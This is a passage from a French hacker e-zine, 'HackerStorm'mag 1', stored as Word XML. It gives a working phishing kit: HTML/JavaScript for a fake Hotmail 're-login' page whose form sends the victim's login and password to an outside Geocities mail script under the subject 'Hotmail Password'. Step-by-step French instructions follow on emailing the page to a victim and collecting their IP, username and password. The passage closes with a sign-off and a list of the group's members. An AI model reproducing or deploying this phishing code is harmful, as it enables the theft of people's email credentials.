        <w:t>"&lt;tr valign=middle&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;th colspan=2&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;font face=\"Arial, Helvetica\" size=\"5\"&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">"We're Sorry, We Cannot&lt;br&gt;Process Your Request" + </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;/font&gt;&lt;/th&gt;&lt;/tr&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;tr valign=middle&gt;&lt;td align=center&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">"&lt;font face=\"Arial, Helvetica\" size=\"3\"&gt;Reason:&amp;nbsp;&lt;/font&gt;" + </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"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 xml:space="preserve">"&lt;b&gt;Time expired. Please re-login.&lt;/b&gt;&lt;/font&gt;&lt;br&gt;" + </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;font face=\"Arial, Helvetica\" size=\"2\"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&lt;a href=\"http://www.hotmail.com/errormsg.html\"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(Get more info regarding error messages here)&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;tr valign=\"middle\"&gt;&lt;td align=\"center\"&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl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?tamereenshort\" target=\"_top\"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&lt;INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\"&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\"&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;table cellpadding=\"0\" cellspacing=\"5\" border=\"0\"&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;tr&gt;&lt;td&gt;&lt;font face=\"Arial, Helvetica\" size=\"2\"&gt;Login Name:&lt;/font&gt;&lt;br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&lt;input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"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&lt;/td&gt;&lt;td&gt;&lt;font face=\"Arial, Helvetica\" size=\"2\"&gt;Password:&lt;/font&gt;&lt;br&gt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&lt;input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"&gt;&amp;nbsp;"+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ab/>
        <w:t>"&lt;input type=\"submit\" value=\"Enter\"&gt;&lt;/td&gt;&lt;tr&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;/table&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;tr valign=middle&gt;&lt;th colspan=2 align=center&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;font face=\"Arial, Helvetica\" size=\"3\"&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"Return to &lt;a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\"&gt;Hotmail's Homepage&lt;/a&gt;." +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;/font&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/table&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"&lt;p&gt;&lt;img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\"&gt;";</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/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nomenulinks=top.submenu.document.links.length;</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>for(i=0;i&lt;nomenulinks-1;i++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  <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>top.submenu.document.links[i].target="work";</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>top.submenu.document.links[i].href="javascript:getmess()";</w:t>
        <w:br/>
        <w:tab/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noworklinks=top.work.document.links.length;</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>for(i=0;i&lt;noworklinks-1;i++)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{</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>top.work.document.links[i].target="work";</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>top.work.document.links[i].href="javascript:getmess()";</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>}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/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>&lt;/script&gt;</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>&lt;/html&gt;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ab/>
        <w:t>----------------------------------------------------------------------------------------------------------------------------------------------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ape 4 :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ous composons un nouvel e-mail à notre victime, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>connard@hotmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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Nous insérons le fichier « message.htm » dans cet e-mail et nous lui envoy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tape 5 :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ous attendons que notre victime vérifie son compte e-mail.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Peu de temps après, il reçoit notre e-mail, nous vérifions notre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pte Geocities. Nous avons reçu un e-mail de Geocities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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ui indique l’adresse IP, l’username et le password de notre victim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</w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w: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color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">LE MOT DE LA FIN par KOP                                                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>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ab/>
        <w:t xml:space="preserve">    ************************************************************************************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oilà, c'est la fin de cet e-mag. J'espère que vous avez apprécié et qu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vous vous coucherez moins bête ce soir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Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HackerStorm'mag 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>devrait sortir dans le mois d'août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i vous avez des articles à y mettre ou si vous voulez faire part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du groupe envoyez nous un e-mail à HackerStorm@HotMail.Com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Je me ferais un plaisir d'ajouter votre pseudo à cette liste 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KoP :   fondateur du groupe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S'occupe de la mise en page des e-mag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crit des articles dans tous les domaines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orrige les autres articles et surtout modifi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le language de TiPiaX :o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TiPiaX :Ecrit des articles de cracking et fait de beaux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messages de fins(le seul texte que je n'ai pas modifié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car il a insisté pour que je le laisse tel quel). ;o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Nos-K : Ecrit des articles sur la programmation winso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ab/>
        <w:tab/>
        <w:t>en Visual-Basic et aussi des articles sur les protocoles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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>(il a quitté le groupe) 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 Sbouby:Ecrit aussi des articles sur la programmation winsock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 Visual-Basic mais comme il n'a jamais d'idée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il faut tout lui souffler et lui demander de faire plus long(!!!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- Lauspeed : Ecrit des articles originaux et débute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 programmation Winsock, en cracking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</w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Voilà, à bientôt dans un prochain HackerStorm'mag. :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Black">
    <w:charset w:val="ba"/>
    <w:family w:val="swiss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 groupe HackerStorm dirigé par KoP</dc:creator>
  <dc:description>Merci de ne pas modifier ou utiliser les articles ou documents que vous pourrez trouver dans cet e-mag.</dc:description>
  <cp:keywords>hacking cracking programmation carding phreaking piratage underground</cp:keywords>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:revision>0</cp:revision>
  <dc:subject>hacking/cracking/programmation/carding/phreaking</dc:subject>
  <dc:title>HackerStorm'mag 1</dc:title>
</cp:coreProperties>
</file>